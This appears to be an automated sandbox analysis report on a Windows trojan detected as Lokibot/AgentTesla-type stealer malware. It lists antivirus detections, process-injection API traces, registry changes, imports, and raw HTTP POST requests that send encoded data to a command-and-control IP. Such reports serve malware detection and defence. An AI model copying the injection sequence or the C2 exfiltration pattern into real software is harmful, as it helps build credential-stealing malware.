8.8
Critical

8480058fc20ebfef47d1ebccbb54b88f656715b99c2d4e80ad46b05906ff4dbe

b56d97ba158e3e81cfc1ed65376bf131.exe

Analysis duration

75s

Last analyzed

File size

726.0KB
Static detections / Dynamic detections: 100% AGEN AGENTTESLA AI SCORE=100 ALI2000015 AUTO AZORULT CLASSIC CONFIDENCE DELF DELFINJECT DELPHILESS EMZL ENAI FAREIT GENERICKD GENETIC HIGH CONFIDENCE HRMDCV KRYPTIK LOKIBOT MALWARE@#11TR2S86TCVEG ORWQ R + TROJ R002C0DHI20 SCORE SUSGEN TGW@A4GQIWII TSCOPE UNSAFE X2094 ZELPHIF
Eagle Eye engine
Not detected: no Eagle Eye engine detection results available
Static verdict
Antivirus engines
Engine Result Scan date Engine version
Alibaba Trojan:Win32/DelfInject.ali2000015 20190527 0.3.0.5
Baidu 20190318 1.0.0.2
Tencent Win32.Trojan.Inject.Auto 20201226 1.0.0.1
Kingsoft 20201226 2017.9.26.565
McAfee Fareit-FPQ!B56D97BA158E 20201226 6.0.6.653
Avast Win32:Trojan-gen 20201226 21.1.5827.0
CrowdStrike win/malicious_confidence_100% (W) 20190702 1.0
Static indicators
Queries the computer name (2 events)
Time & API Arguments Status Return Repeated
1619885621.193374
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1619885621.193374
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
Collects information to fingerprint the system (MachineGuid, DigitalProductId, SystemBiosDate) (1 event)
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid
Checks the amount of memory in the system; this can be used to detect virtual machines that have little memory available (1 event)
Time & API Arguments Status Return Repeated
1619885621.162374
GlobalMemoryStatusEx
success 1 0
The executable contains unknown PE section names indicative of a packer (could be a false positive) (3 events)
section CODE
section DATA
section BSS
The executable uses a known packer (1 event)
packer BobSoft Mini Delphi -> BoB / BobSoft
Behavioral verdict
Dynamic indicators
One or more potentially interesting buffers were extracted; these generally contain injected code, configuration data, etc.
HTTP traffic contains suspicious features which may be indicative of malware-related traffic (1 event)
suspicious_features POST method with no referer header, Connection to IP address
suspicious_request POST http://136.144.237.217/index.php
Performs some HTTP requests (1 event)
request POST http://136.144.237.217/index.php
Sends data using the HTTP POST method (1 event)
request POST http://136.144.237.217/index.php
Allocates read-write-execute memory (usually to unpack itself) (3 events)
Time & API Arguments Status Return Repeated
1619861119.779372
NtAllocateVirtualMemory
process_identifier: 472
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x003e0000
success 0 0
1619861119.983372
NtProtectVirtualMemory
process_identifier: 472
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 77824
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x00472000
success 0 0
1619861119.998372
NtAllocateVirtualMemory
process_identifier: 472
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
base_address: 0x005e0000
success 0 0
Searches running processes, potentially to identify processes for sandbox evasion, code injection or memory dumping (1 event)
Checks adapter addresses, which can be used to detect virtual network interfaces (1 event)
Time & API Arguments Status Return Repeated
1619885621.975374
GetAdaptersAddresses
flags: 0
family: 0
failed 111 0
The binary likely contains encrypted or compressed data indicative of a packer (2 events)
entropy 7.508624119375818 section {'size_of_data': '0x00025400', 'virtual_address': '0x00096000', 'entropy': 7.508624119375818, 'name': '.rsrc', 'virtual_size': '0x00025380'} description A section with a high entropy has been found
entropy 0.20551724137931035 description Overall entropy of this PE file is high
Network communication
Communicates with a host for which no DNS query was performed (2 events)
host 136.144.237.217
host 172.217.24.14
Sets or modifies the WPAD proxy autoconfiguration file for traffic interception (15 events)
Time & API Arguments Status Return Repeated
1619885624.756374
RegSetValueExA
key_handle: 0x00000358
value: 1
regkey_r: WpadDecisionReason
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadDecisionReason
success 0 0
1619885624.756374
RegSetValueExA
key_handle: 0x00000358
value: @çŸÈ™>×
regkey_r: WpadDecisionTime
reg_type: 3 (REG_BINARY)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadDecisionTime
success 0 0
1619885624.756374
RegSetValueExA
key_handle: 0x00000358
value: 3
regkey_r: WpadDecision
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadDecision
success 0 0
1619885624.756374
RegSetValueExW
key_handle: 0x00000358
value: 网络 2
regkey_r: WpadNetworkName
reg_type: 1 (REG_SZ)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadNetworkName
success 0 0
1619885624.771374
RegSetValueExA
key_handle: 0x00000370
value: 1
regkey_r: WpadDecisionReason
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-00-27-00-00-00\WpadDecisionReason
success 0 0
1619885624.771374
RegSetValueExA
key_handle: 0x00000370
value: @çŸÈ™>×
regkey_r: WpadDecisionTime
reg_type: 3 (REG_BINARY)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-00-27-00-00-00\WpadDecisionTime
success 0 0
1619885624.771374
RegSetValueExA
key_handle: 0x00000370
value: 3
regkey_r: WpadDecision
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-00-27-00-00-00\WpadDecision
success 0 0
1619885624.865374
RegSetValueExW
key_handle: 0x00000354
value: {40112ABE-63B3-43C3-BE93-1440EE3AF106}
regkey_r: WpadLastNetwork
reg_type: 1 (REG_SZ)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\WpadLastNetwork
success 0 0
1619885626.240374
RegSetValueExA
key_handle: 0x000003b8
value: 1
regkey_r: WpadDecisionReason
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadDecisionReason
success 0 0
1619885626.240374
RegSetValueExA
key_handle: 0x000003b8
value: ‚É™>×
regkey_r: WpadDecisionTime
reg_type: 3 (REG_BINARY)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadDecisionTime
success 0 0
1619885626.240374
RegSetValueExA
key_handle: 0x000003b8
value: 0
regkey_r: WpadDecision
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadDecision
success 0 0
1619885626.240374
RegSetValueExW
key_handle: 0x000003b8
value: 网络 2
regkey_r: WpadNetworkName
reg_type: 1 (REG_SZ)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadNetworkName
success 0 0
1619885626.240374
RegSetValueExA
key_handle: 0x000003bc
value: 1
regkey_r: WpadDecisionReason
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-00-27-00-00-00\WpadDecisionReason
success 0 0
1619885626.240374
RegSetValueExA
key_handle: 0x000003bc
value: ‚É™>×
regkey_r: WpadDecisionTime
reg_type: 3 (REG_BINARY)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-00-27-00-00-00\WpadDecisionTime
success 0 0
1619885626.240374
RegSetValueExA
key_handle: 0x000003bc
value: 0
regkey_r: WpadDecision
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-00-27-00-00-00\WpadDecision
success 0 0
Used NtSetContextThread to modify a thread in a remote process, indicative of process injection (2 events)
Process injection Process 472 called NtSetContextThread to modify thread in remote process 152
Time & API Arguments Status Return Repeated
1619861120.561372
NtSetContextThread
thread_handle: 0x000000f8
registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 4301304
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
process_identifier: 152
success 0 0
Resumed a suspended thread in a remote process, potentially indicative of process injection (2 events)
Process injection Process 472 resumed a thread in remote process 152
Time & API Arguments Status Return Repeated
1619861121.045372
NtResumeThread
thread_handle: 0x000000f8
suspend_count: 1
process_identifier: 152
success 0 0
Executed a process and injected code into it, probably while unpacking (7 events)
Time & API Arguments Status Return Repeated
1619861120.420372
CreateProcessInternalW
thread_identifier: 2244
thread_handle: 0x000000f8
process_identifier: 152
current_directory:
filepath:
track: 1
command_line: "C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\b56d97ba158e3e81cfc1ed65376bf131.exe"
filepath_r:
stack_pivoted: 0
creation_flags: 4 (CREATE_SUSPENDED)
process_handle: 0x000000fc
inherit_handles: 0
success 1 0
1619861120.420372
NtUnmapViewOfSection
process_identifier: 152
region_size: 4096
process_handle: 0x000000fc
base_address: 0x00400000
success 0 0
1619861120.420372
NtMapViewOfSection
section_handle: 0x00000104
process_identifier: 152
commit_size: 131072
win32_protect: 64 (PAGE_EXECUTE_READWRITE)
buffer:
process_handle: 0x000000fc
allocation_type: 0 ()
section_offset: 0
view_size: 131072
base_address: 0x00400000
success 0 0
1619861120.561372
NtGetContextThread
thread_handle: 0x000000f8
success 0 0
1619861120.561372
NtSetContextThread
thread_handle: 0x000000f8
registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 4301304
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
process_identifier: 152
success 0 0
1619861121.045372
NtResumeThread
thread_handle: 0x000000f8
suspend_count: 1
process_identifier: 152
success 0 0
1619885621.178374
NtResumeThread
thread_handle: 0x000000e8
suspend_count: 1
process_identifier: 152
success 0 0
File has been identified by 57 antivirus engines on VirusTotal as malicious (50 out of 57 events shown)
Elastic malicious (high confidence)
MicroWorld-eScan Trojan.GenericKD.34374041
FireEye Generic.mg.b56d97ba158e3e81
ALYac Trojan.GenericKD.34374041
Cylance Unsafe
Zillya Trojan.Injector.Win32.762513
Sangfor Malware
K7AntiVirus Trojan ( 0056c99c1 )
Alibaba Trojan:Win32/DelfInject.ali2000015
K7GW Trojan ( 0056c99c1 )
Cybereason malicious.a158e3
Arcabit Trojan.Generic.D20C8199
Cyren W32/Injector.ORWQ-3620
Symantec Infostealer.Lokibot!43
APEX Malicious
Paloalto generic.ml
ClamAV Win.Keylogger.AgentTesla-9372622-1
Kaspersky HEUR:Trojan.Win32.Kryptik.gen
BitDefender Trojan.GenericKD.34374041
NANO-Antivirus Trojan.Win32.Kryptik.hrmdcv
Tencent Win32.Trojan.Inject.Auto
Ad-Aware Trojan.GenericKD.34374041
Emsisoft Trojan.GenericKD.34374041 (B)
Comodo Malware@#11tr2s86tcveg
F-Secure Heuristic.HEUR/AGEN.1138685
DrWeb Trojan.PWS.Stealer.29093
VIPRE Trojan.Win32.Generic!BT
TrendMicro TROJ_GEN.R002C0DHI20
McAfee-GW-Edition BehavesLike.Win32.Fareit.bh
MaxSecure Trojan.Malware.300983.susgen
Sophos Mal/Generic-R + Troj/Azorult-FU
Jiangmin Trojan.Kryptik.cbz
Webroot W32.Trojan.Gen
Avira HEUR/AGEN.1138685
Antiy-AVL Trojan/Win32.Kryptik
Gridinsoft Trojan.Win32.Kryptik.oa
Microsoft Trojan:Win32/Fareit.VD!MTB
ZoneAlarm HEUR:Trojan.Win32.Kryptik.gen
GData Trojan.GenericKD.34374041
Cynet Malicious (score: 100)
AhnLab-V3 Suspicious/Win.Delphiless.X2094
Acronis suspicious
McAfee Fareit-FPQ!B56D97BA158E
MAX malware (ai score=100)
VBA32 TScope.Trojan.Delf
Malwarebytes Trojan.MalPack
Panda Trj/Genetic.gen
ESET-NOD32 a variant of Win32/Injector.ENAI
TrendMicro-HouseCall TROJ_GEN.R002C0DHI20
Rising Trojan.Kryptik!1.CAC0 (CLASSIC)
Visual analysis
Binary image
No binary image: no binary visualization image was generated for this sample
Runtime screenshots
No runtime screenshots: no screenshots were captured while the sample ran

PE Compile Time

1992-06-20 06:22:17

Imports

Library kernel32.dll:
0x488164 VirtualFree
0x488168 VirtualAlloc
0x48816c LocalFree
0x488170 LocalAlloc
0x488174 GetVersion
0x488178 GetCurrentThreadId
0x488184 VirtualQuery
0x488188 WideCharToMultiByte
0x488190 MultiByteToWideChar
0x488194 lstrlenA
0x488198 lstrcpynA
0x48819c LoadLibraryExA
0x4881a0 GetThreadLocale
0x4881a4 GetStartupInfoA
0x4881a8 GetProcAddress
0x4881ac GetModuleHandleA
0x4881b0 GetModuleFileNameA
0x4881b4 GetLocaleInfoA
0x4881b8 GetLastError
0x4881c0 GetCommandLineA
0x4881c4 FreeLibrary
0x4881c8 FindFirstFileA
0x4881cc FindClose
0x4881d0 ExitProcess
0x4881d4 WriteFile
0x4881dc RtlUnwind
0x4881e0 RaiseException
0x4881e4 GetStdHandle
Library user32.dll:
0x4881ec GetKeyboardType
0x4881f0 LoadStringA
0x4881f4 MessageBoxA
0x4881f8 CharNextA
Library advapi32.dll:
0x488200 RegQueryValueExA
0x488204 RegOpenKeyExA
0x488208 RegCloseKey
Library oleaut32.dll:
0x488210 SysFreeString
0x488214 SysReAllocStringLen
0x488218 SysAllocStringLen
Library kernel32.dll:
0x488220 TlsSetValue
0x488224 TlsGetValue
0x488228 LocalAlloc
0x48822c GetModuleHandleA
Library advapi32.dll:
0x488234 RegQueryValueExA
0x488238 RegOpenKeyExA
0x48823c RegCloseKey
Library kernel32.dll:
0x488244 lstrcpyA
0x488248 WriteFile
0x48824c WaitForSingleObject
0x488250 VirtualQuery
0x488254 VirtualProtect
0x488258 VirtualAlloc
0x48825c Sleep
0x488260 SizeofResource
0x488264 SetThreadLocale
0x488268 SetFilePointer
0x48826c SetEvent
0x488270 SetErrorMode
0x488274 SetEndOfFile
0x488278 ResetEvent
0x48827c ReadFile
0x488280 MultiByteToWideChar
0x488284 MulDiv
0x488288 LockResource
0x48828c LoadResource
0x488290 LoadLibraryA
0x48829c GlobalUnlock
0x4882a0 GlobalReAlloc
0x4882a4 GlobalHandle
0x4882a8 GlobalLock
0x4882ac GlobalFree
0x4882b0 GlobalFindAtomA
0x4882b4 GlobalDeleteAtom
0x4882b8 GlobalAlloc
0x4882bc GlobalAddAtomA
0x4882c0 GetVersionExA
0x4882c4 GetVersion
0x4882c8 GetTickCount
0x4882cc GetThreadLocale
0x4882d4 GetSystemInfo
0x4882d8 GetStringTypeExA
0x4882dc GetStdHandle
0x4882e0 GetProcAddress
0x4882e4 GetModuleHandleA
0x4882e8 GetModuleFileNameA
0x4882ec GetLocaleInfoA
0x4882f0 GetLocalTime
0x4882f4 GetLastError
0x4882f8 GetFullPathNameA
0x4882fc GetFileAttributesA
0x488300 GetDiskFreeSpaceA
0x488304 GetDateFormatA
0x488308 GetCurrentThreadId
0x48830c GetCurrentProcessId
0x488310 GetCPInfo
0x488314 GetACP
0x488318 FreeResource
0x488320 InterlockedExchange
0x488328 FreeLibrary
0x48832c FormatMessageA
0x488330 FindResourceA
0x488334 FindNextFileA
0x488338 FindFirstFileA
0x48833c FindClose
0x48834c EnumCalendarInfoA
0x488358 CreateThread
0x48835c CreateFileA
0x488360 CreateEventA
0x488364 CompareStringA
0x488368 CloseHandle
Library version.dll:
0x488370 VerQueryValueA
0x488378 GetFileVersionInfoA
Library gdi32.dll:
0x488380 UnrealizeObject
0x488384 StretchBlt
0x488388 SetWindowOrgEx
0x48838c SetViewportOrgEx
0x488390 SetTextColor
0x488394 SetStretchBltMode
0x488398 SetROP2
0x48839c SetPixel
0x4883a0 SetDIBColorTable
0x4883a4 SetBrushOrgEx
0x4883a8 SetBkMode
0x4883ac SetBkColor
0x4883b0 SelectPalette
0x4883b4 SelectObject
0x4883b8 SaveDC
0x4883bc RestoreDC
0x4883c0 RectVisible
0x4883c4 RealizePalette
0x4883c8 PatBlt
0x4883cc MoveToEx
0x4883d0 MaskBlt
0x4883d4 LineTo
0x4883d8 IntersectClipRect
0x4883dc GetWindowOrgEx
0x4883e0 GetTextMetricsA
0x4883ec GetStockObject
0x4883f0 GetPixel
0x4883f4 GetPaletteEntries
0x4883f8 GetObjectA
0x4883fc GetDeviceCaps
0x488400 GetDIBits
0x488404 GetDIBColorTable
0x488408 GetDCOrgEx
0x488410 GetClipBox
0x488414 GetBrushOrgEx
0x488418 GetBitmapBits
0x48841c ExtTextOutA
0x488420 ExcludeClipRect
0x488424 DeleteObject
0x488428 DeleteDC
0x48842c CreateSolidBrush
0x488430 CreatePenIndirect
0x488434 CreatePalette
0x48843c CreateFontIndirectA
0x488440 CreateDIBitmap
0x488444 CreateDIBSection
0x488448 CreateCompatibleDC
0x488450 CreateBrushIndirect
0x488454 CreateBitmap
0x488458 BitBlt
Library user32.dll:
0x488460 CreateWindowExA
0x488464 WindowFromPoint
0x488468 WinHelpA
0x48846c WaitMessage
0x488470 UpdateWindow
0x488474 UnregisterClassA
0x488478 UnhookWindowsHookEx
0x48847c TranslateMessage
0x488484 TrackPopupMenu
0x48848c ShowWindow
0x488490 ShowScrollBar
0x488494 ShowOwnedPopups
0x488498 ShowCursor
0x48849c SetWindowsHookExA
0x4884a0 SetWindowTextA
0x4884a4 SetWindowPos
0x4884a8 SetWindowPlacement
0x4884ac SetWindowLongA
0x4884b0 SetTimer
0x4884b4 SetScrollRange
0x4884b8 SetScrollPos
0x4884bc SetScrollInfo
0x4884c0 SetRect
0x4884c4 SetPropA
0x4884c8 SetParent
0x4884cc SetMenuItemInfoA
0x4884d0 SetMenu
0x4884d4 SetForegroundWindow
0x4884d8 SetFocus
0x4884dc SetCursor
0x4884e0 SetClassLongA
0x4884e4 SetCapture
0x4884e8 SetActiveWindow
0x4884ec SendMessageA
0x4884f0 ScrollWindow
0x4884f4 ScreenToClient
0x4884f8 RemovePropA
0x4884fc RemoveMenu
0x488500 ReleaseDC
0x488504 ReleaseCapture
0x488510 RegisterClassA
0x488514 RedrawWindow
0x488518 PtInRect
0x48851c PostQuitMessage
0x488520 PostMessageA
0x488524 PeekMessageA
0x488528 OffsetRect
0x48852c OemToCharA
0x488530 MessageBoxA
0x488534 MapWindowPoints
0x488538 MapVirtualKeyA
0x48853c LoadStringA
0x488540 LoadKeyboardLayoutA
0x488544 LoadIconA
0x488548 LoadCursorA
0x48854c LoadBitmapA
0x488550 KillTimer
0x488554 IsZoomed
0x488558 IsWindowVisible
0x48855c IsWindowEnabled
0x488560 IsWindow
0x488564 IsRectEmpty
0x488568 IsIconic
0x48856c IsDialogMessageA
0x488570 IsChild
0x488574 InvalidateRect
0x488578 IntersectRect
0x48857c InsertMenuItemA
0x488580 InsertMenuA
0x488584 InflateRect
0x48858c GetWindowTextA
0x488590 GetWindowRect
0x488594 GetWindowPlacement
0x488598 GetWindowLongA
0x48859c GetWindowDC
0x4885a0 GetTopWindow
0x4885a4 GetSystemMetrics
0x4885a8 GetSystemMenu
0x4885ac GetSysColorBrush
0x4885b0 GetSysColor
0x4885b4 GetSubMenu
0x4885b8 GetScrollRange
0x4885bc GetScrollPos
0x4885c0 GetScrollInfo
0x4885c4 GetPropA
0x4885c8 GetParent
0x4885cc GetWindow
0x4885d0 GetMenuStringA
0x4885d4 GetMenuState
0x4885d8 GetMenuItemInfoA
0x4885dc GetMenuItemID
0x4885e0 GetMenuItemCount
0x4885e4 GetMenu
0x4885e8 GetLastActivePopup
0x4885ec GetKeyboardState
0x4885f4 GetKeyboardLayout
0x4885f8 GetKeyState
0x4885fc GetKeyNameTextA
0x488600 GetInputState
0x488604 GetIconInfo
0x488608 GetForegroundWindow
0x48860c GetFocus
0x488610 GetDlgItem
0x488614 GetDesktopWindow
0x488618 GetDCEx
0x48861c GetDC
0x488620 GetCursorPos
0x488624 GetCursor
0x488628 GetClientRect
0x48862c GetClassNameA
0x488630 GetClassInfoA
0x488634 GetCapture
0x488638 GetActiveWindow
0x48863c FrameRect
0x488640 FindWindowA
0x488644 FillRect
0x488648 EqualRect
0x48864c EnumWindows
0x488650 EnumThreadWindows
0x488654 EndPaint
0x488658 EnableWindow
0x48865c EnableScrollBar
0x488660 EnableMenuItem
0x488664 DrawTextA
0x488668 DrawMenuBar
0x48866c DrawIconEx
0x488670 DrawIcon
0x488674 DrawFrameControl
0x488678 DrawFocusRect
0x48867c DrawEdge
0x488680 DispatchMessageA
0x488684 DestroyWindow
0x488688 DestroyMenu
0x48868c DestroyIcon
0x488690 DestroyCursor
0x488694 DeleteMenu
0x488698 DefWindowProcA
0x48869c DefMDIChildProcA
0x4886a0 DefFrameProcA
0x4886a4 CreatePopupMenu
0x4886a8 CreateMenu
0x4886ac CreateIcon
0x4886b0 ClientToScreen
0x4886b4 CheckMenuItem
0x4886b8 CallWindowProcA
0x4886bc CallNextHookEx
0x4886c0 BeginPaint
0x4886c4 CharNextA
0x4886c8 CharLowerBuffA
0x4886cc CharLowerA
0x4886d0 CharToOemA
0x4886d4 AdjustWindowRectEx
Library kernel32.dll:
0x4886e0 Sleep
Library oleaut32.dll:
0x4886e8 SafeArrayPtrOfIndex
0x4886ec SafeArrayGetUBound
0x4886f0 SafeArrayGetLBound
0x4886f4 SafeArrayCreate
0x4886f8 VariantChangeType
0x4886fc VariantCopy
0x488700 VariantClear
0x488704 VariantInit
Library ole32.dll:
0x48870c CoCreateInstance
0x488710 CoUninitialize
0x488714 CoInitialize
Library oleaut32.dll:
0x48871c CreateErrorInfo
0x488720 GetErrorInfo
0x488724 SetErrorInfo
0x488728 SysFreeString
Library comctl32.dll:
0x488738 ImageList_Write
0x48873c ImageList_Read
0x48874c ImageList_DragMove
0x488750 ImageList_DragLeave
0x488754 ImageList_DragEnter
0x488758 ImageList_EndDrag
0x48875c ImageList_BeginDrag
0x488760 ImageList_Remove
0x488764 ImageList_DrawEx
0x488768 ImageList_Replace
0x48876c ImageList_Draw
0x48877c ImageList_Add
0x488784 ImageList_Destroy
0x488788 ImageList_Create
Library comdlg32.dll:
0x488790 GetOpenFileNameA

Hosts

No hosts contacted.

TCP

Source Source Port Destination Destination Port
192.168.56.101 49180 136.144.237.217 80
192.168.56.101 49181 136.144.237.217 80

UDP

Source Source Port Destination Destination Port
192.168.56.101 49235 114.114.114.114 53
192.168.56.101 50534 114.114.114.114 53
192.168.56.101 56539 114.114.114.114 53
192.168.56.101 65004 114.114.114.114 53
192.168.56.101 137 192.168.56.255 137
192.168.56.101 138 192.168.56.255 138
192.168.56.101 51808 224.0.0.252 5355
192.168.56.101 55368 224.0.0.252 5355
192.168.56.101 56804 224.0.0.252 5355
192.168.56.101 60123 224.0.0.252 5355
192.168.56.101 62191 224.0.0.252 5355
192.168.56.101 1900 239.255.255.250 1900
192.168.56.101 50535 239.255.255.250 3702
192.168.56.101 50537 239.255.255.250 3702
192.168.56.101 56540 239.255.255.250 3702
192.168.56.101 56807 239.255.255.250 1900
192.168.56.101 58707 239.255.255.250 3702

HTTP & HTTPS Requests

URI Data
http://136.144.237.217/index.php
POST /index.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
Host: 136.144.237.217
Content-Length: 113
Cache-Control: no-cache

J/\xfb8/\xfb4/\xfb<H\xed>2\xed>9\xed>:\xed?N\xed>8\xed>2\xed><\x8b(9\xfbIL\x8b(8\x8c(9\xffK/\xfb?/\xfb>/\xfb8/\xfb</\xfb>/\xfb8/\xfaI/\xfb9/\xfb9/\xfb5/\xfb?/\xfb:O\xed>?\xed>9\xed?N\xed>2\xed><\x89(9\xfaN/\xfb4/\xfb4/\xfb5O
http://136.144.237.217/index.php
POST /index.php HTTP/1.0
Host: 136.144.237.217
Connection: close
User-agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
Content-Length: 113

J/?/?/?H?2?9?:?N?8?2?<?9\xfbIL?8?9\xffK/?/?/?/?/?/?/\xfaI/?/?/?/?/?O???9?N?2?<?9\xfaN/?/?/?O

ICMP traffic

No ICMP traffic performed.

IRC traffic

No IRC requests performed.

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Snort Alerts

No Snort Alerts

Sorry! No dropped files.
Sorry! No dropped buffers.